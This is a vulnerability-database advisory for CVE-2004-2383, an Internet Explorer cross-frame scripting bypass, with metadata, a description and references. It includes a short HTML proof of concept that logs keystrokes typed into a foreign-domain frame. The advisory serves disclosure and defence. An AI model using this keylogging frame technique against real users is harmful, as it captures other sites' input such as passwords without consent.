Microsoft Internet Explorer Cross-Frame Scripting Restriction Bypass Vulnerability

Vulnerability ID: 1107755
Vulnerability type: Access validation error
Published: 2004-02-27
Updated: 2005-10-20
CVE ID: CVE-2004-2383
CNNVD-ID: CNNVD-200412-571
Platform: Windows
CVSS score: 5.1
|Vulnerability source
https://www.exploit-db.com/exploits/23766
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-571
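|Vulnerability details
Microsoft Internet Explorer is a popular web browser. Microsoft Internet Explorer contains an access validation error that allows a remote attacker to bypass the cross-frame scripting restrictions and have malicious script executed as blindly "trusted". The problem is caused by insufficient restrictions in IE's event handling functions. According to Microsoft Knowledge Base Article 167796 (http://support.microsoft.com/support/kb/articles/Q167/7/96.asp), access between frames in different domains must be restricted. However, by constructing a frame definition that contains malicious JavaScript, the frame access restriction can be bypassed. An attacker can exploit this vulnerability by luring a user to a page that contains the malicious frame, in order to obtain sensitive information or to have the user access a spoofed page under trusted conditions.
|Exploit (EXP)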
source: http://www.securityfocus.com/bid/9761/info

Microsoft Internet Explorer is reported to be prone to an issue that may leak sensitive information across foreign domains.

This issue could permit framesets in different domains to leak various events, including keyboard events. This could effectively permit a hostile web page to capture keystrokes from a foreign domain. 

<html>
<head><title>IE Cross Frame Scripting Restriction Bypass Example</title>
<script>
var keylog='';
document.onkeypress = function () {
k = window.event.keyCode;
window.status = keylog += String.fromCharCode(k) + '[' + k +']';
}
</script>
</head>
<frameset onLoad="this.focus();" onBlur="this.focus();" cols="100%,*">
<frame src="http://www.example.com" scrolling="auto">
</frameset>
</html>
|References

Source: XF
Name: ie-frame-domain-bypass(15337)
Link: http://xforce.iss.net/xforce/xfdb/15337
Source: BID
Name: 9761
Link: http://www.securityfocus.com/bid/9761
Source: IDEFENSE
Name: 20040227 Microsoft Internet Explorer Cross Frame Scripting Restriction Bypass
Link: http://www.idefense.com/application/poi/display?id=77&type=vulnerabilities&flashstatus=false
Source: NSFOCUS
Name: 6101
Link: http://www.nsfocus.net/vulndb/6101
